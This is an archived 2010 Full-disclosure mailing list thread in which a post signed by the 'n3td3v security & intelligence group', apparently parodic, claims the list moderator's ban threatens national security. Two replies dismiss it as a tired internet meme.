http://www.free-press-release.com/news-united-states-department-of-defense-embraces-hacker-certification-to-protect-us-interests-1267435223.html

Regards

Re: [Full-disclosure] full disclosure is an intelligence blackhole

2010-03-01 Thread Christian Sciberras
Boring?
Amusing more likely.

On Mon, Mar 1, 2010 at 9:53 AM, McGhee, Eddie  wrote:

> Come on mate seriously its getting boring, if any serious security threats
> are out there then drop the info and man up, stop with the bullshit of
> making netdev a poor internet meme, because that's all it is..
>
> -Original Message-
> From: full-disclosure-boun...@lists.grok.org.uk [mailto:
> full-disclosure-boun...@lists.grok.org.uk] On Behalf Of intel unit
> Sent: 01 March 2010 08:06
> To: full-disclosure@lists.grok.org.uk
> Subject: [Full-disclosure] full disclosure is an intelligence blackhole
>
> -BEGIN PGP SIGNED MESSAGE-
> Hash: SHA1
>
> John Cartwright is perpetrating global conflict by censoring n3td3v's 0days
> and commenting.
> Opinion by Andrew Wallace. Published by a believer in free speech who knows
> Andrew Wallace is an super spy expert. Luyk a jelly samwich amirite?
>
>
> Is banning people from a mailing list a national security risk?
>
> We haven't been on the mailing list since January 2009, although there have
> been plenty of hackers trying to impersonate us.
>
> For sure the impersonations are misleading, and we would like to ask, is
> banning people from a mailing list a vulnerability?
>
> Let's just say we haven't been able to release any information to the
> public for over a year now.
>
> We don't have anywhere we can post information.
>
> Isn't it a security risk to ban one the biggest security & intelligence
> groups in the UK from posting?
>
> We think so, and why would you want to create a climate where there are
> plenty n3td3v wanna be's posting to the mailing list, but no actual
> intelligence on what we're upto, what we've been researching or anything
> like that.
>
> A security & intelligence group with over 6000 security professionals in
> jobs around the world who make up the n3td3v group, banned from making
> announcements relating to national security matters.
>
> A whole year of no information getting out to the security industry about
> the vulnerabilities in national security and other research that we've been
> getting upto.
>
> None of that has been post, its all been supressed.
>
> By who? One man decided to risk security by banning one of the largest
> security groups in the United Kingdom.
>
> We were treated badly on the mailing list, it wasn't us in the wrong, we
> only defended ourselves and the integrity of our group from people who were
> obviously wanting an argument.
>
> We aren't playing around, we are grown adults who are serious about
> security & intelligence.
>
> We were made out to be something that we weren't, its not nice to be
> treated like that.
>
> It's why the mailing list can't be taken seriously and poses a risk to
> national security.
>
> Because the people who do research security aren't able to post on the
> mailing list.
>
> And I don't know why more people haven't spoken out about an organisation
> as big as n3td3v being banned from the mailing list, its a risk to national
> security.
>
> We don't post our intelligence anywhere else apart from the mailing list
> we've been banned from, and we don't give out any signals intelligence about
> what we are getting upto, we're very careful about that.
>
> The only opportunity to find out what the n3td3v security and intelligence
> group were upto was being subscribed to the mailing list and reading our
> emails.
>
> Andrew is banned, and banned with that are the voices of over 6000 and more
> researchers, security consultants and many others.
>
> Is banning n3td3v from Full-disclosure mailing list a national security
> issue? Of course it is.
>
> National security has been at risk for over a year and will remain at
> risk... because the information flow has been cut off.
>
> Who will be to blame? One man who runs the mailing list, one man will need
> to live with himself, his name is John Cartwright.
>
> He has cut off a major security research and intelligence group on purpose,
> I don't think he cares about national security.
>
> Can he live with himself?
>
> We've been sitting in our offices wondering this for over a year, we've
> held security conferences with our members and other stuff and remain
> frustrated that we've been cut off from communicating with the security
> industry.
>
> Yours faithfully,
>
> n3td3v security
> & intelligence group

Re: [Full-disclosure] full disclosure is an intelligence blackhole

2010-03-01 Thread McGhee, Eddie
Come on mate seriously it's getting boring, if any serious security threats are
out there then drop the info and man up, stop with the bullshit of making
netdev a poor internet meme, because that's all it is..

-Original Message-
From: full-disclosure-boun...@lists.grok.org.uk 
[mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of intel unit
Sent: 01 March 2010 08:06
To: full-disclosure@lists.grok.org.uk
Subject: [Full-disclosure] full disclosure is an intelligence blackhole

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

John Cartwright is perpetrating global conflict by censoring n3td3v's 0days and 
commenting.
Opinion by Andrew Wallace. Published by a believer in free speech who knows 
Andrew Wallace is an super spy expert. Luyk a jelly samwich amirite?


Is banning people from a mailing list a national security risk?

We haven't been on the mailing list since January 2009, although there have 
been plenty of hackers trying to impersonate us.

For sure the impersonations are misleading, and we would like to ask, is 
banning people from a mailing list a vulnerability?

Let's just say we haven't been able to release any information to the public 
for over a year now.

We don't have anywhere we can post information.

Isn't it a security risk to ban one the biggest security & intelligence groups 
in the UK from posting?

We think so, and why would you want to create a climate where there are plenty 
n3td3v wanna be's posting to the mailing list, but no actual intelligence on 
what we're upto, what we've been researching or anything like that.

A security & intelligence group with over 6000 security professionals in jobs 
around the world who make up the n3td3v group, banned from making announcements 
relating to national security matters.

A whole year of no information getting out to the security industry about the 
vulnerabilities in national security and other research that we've been getting 
upto.

None of that has been post, its all been supressed.

By who? One man decided to risk security by banning one of the largest security 
groups in the United Kingdom.

We were treated badly on the mailing list, it wasn't us in the wrong, we only 
defended ourselves and the integrity of our group from people who were 
obviously wanting an argument.

We aren't playing around, we are grown adults who are serious about security & 
intelligence.

We were made out to be something that we weren't, its not nice to be treated 
like that.

It's why the mailing list can't be taken seriously and poses a risk to national 
security.

Because the people who do research security aren't able to post on the mailing 
list.

And I don't know why more people haven't spoken out about an organisation as 
big as n3td3v being banned from the mailing list, its a risk to national 
security.

We don't post our intelligence anywhere else apart from the mailing list we've 
been banned from, and we don't give out any signals intelligence about what we 
are getting upto, we're very careful about that.

The only opportunity to find out what the n3td3v security and intelligence 
group were upto was being subscribed to the mailing list and reading our emails.

Andrew is banned, and banned with that are the voices of over 6000 and more 
researchers, security consultants and many others.

Is banning n3td3v from Full-disclosure mailing list a national security issue? 
Of course it is.

National security has been at risk for over a year and will remain at risk... 
because the information flow has been cut off.

Who will be to blame? One man who runs the mailing list, one man will need to 
live with himself, his name is John Cartwright.

He has cut off a major security research and intelligence group on purpose, I 
don't think he cares about national security.

Can he live with himself?

We've been sitting in our offices wondering this for over a year, we've held 
security conferences with our members and other stuff and remain frustrated 
that we've been cut off from communicating with the security industry.

Yours faithfully,

n3td3v security
& intelligence group


[Full-disclosure] full disclosure is an intelligence blackhole

2010-03-01 Thread intel unit

John Cartwright is perpetrating global conflict by censoring
n3td3v's 0days and commenting.
Opinion by Andrew Wallace. Published by a believer in free speech
who knows Andrew Wallace is a super spy expert. Luyk a jelly
samwich amirite?


Is banning people from a mailing list a national security risk?

We haven't been on the mailing list since January 2009, although
there have been plenty of hackers trying to impersonate us.

For sure the impersonations are misleading, and we would like to
ask, is banning people from a mailing list a vulnerability?

Let's just say we haven't been able to release any information to
the public for over a year now.

We don't have anywhere we can post information.

Isn't it a security risk to ban one of the biggest security &
intelligence groups in the UK from posting?

We think so, and why would you want to create a climate where there
are plenty of n3td3v wannabes posting to the mailing list, but no
actual intelligence on what we're up to, what we've been researching
or anything like that.

A security & intelligence group with over 6000 security
professionals in jobs around the world who make up the n3td3v
group, banned from making announcements relating to national
security matters.

A whole year of no information getting out to the security industry
about the vulnerabilities in national security and other research
that we've been getting up to.

None of that has been posted, it's all been suppressed.

By who? One man decided to risk security by banning one of the
largest security groups in the United Kingdom.

We were treated badly on the mailing list, it wasn't us in the
wrong, we only defended ourselves and the integrity of our group
from people who were obviously wanting an argument.

We aren't playing around, we are grown adults who are serious about
security & intelligence.

We were made out to be something that we weren't, it's not nice to
be treated like that.

It's why the mailing list can't be taken seriously and poses a risk
to national security.

Because the people who do research security aren't able to post on
the mailing list.

And I don't know why more people haven't spoken out about an
organisation as big as n3td3v being banned from the mailing list,
it's a risk to national security.

We don't post our intelligence anywhere else apart from the mailing
list we've been banned from, and we don't give out any signals
intelligence about what we are getting up to, we're very careful
about that.

The only opportunity to find out what the n3td3v security and
intelligence group were up to was being subscribed to the mailing
list and reading our emails.

Andrew is banned, and banned with that are the voices of over 6000
and more researchers, security consultants and many others.

Is banning n3td3v from Full-disclosure mailing list a national
security issue? Of course it is.

National security has been at risk for over a year and will remain
at risk... because the information flow has been cut off.

Who will be to blame? One man who runs the mailing list, one man
will need to live with himself, his name is John Cartwright.

He has cut off a major security research and intelligence group on
purpose, I don't think he cares about national security.

Can he live with himself?

We've been sitting in our offices wondering this for over a year,
we've held security conferences with our members and other stuff
and remain frustrated that we've been cut off from communicating
with the security industry.

Yours faithfully,

n3td3v security
& intelligence group
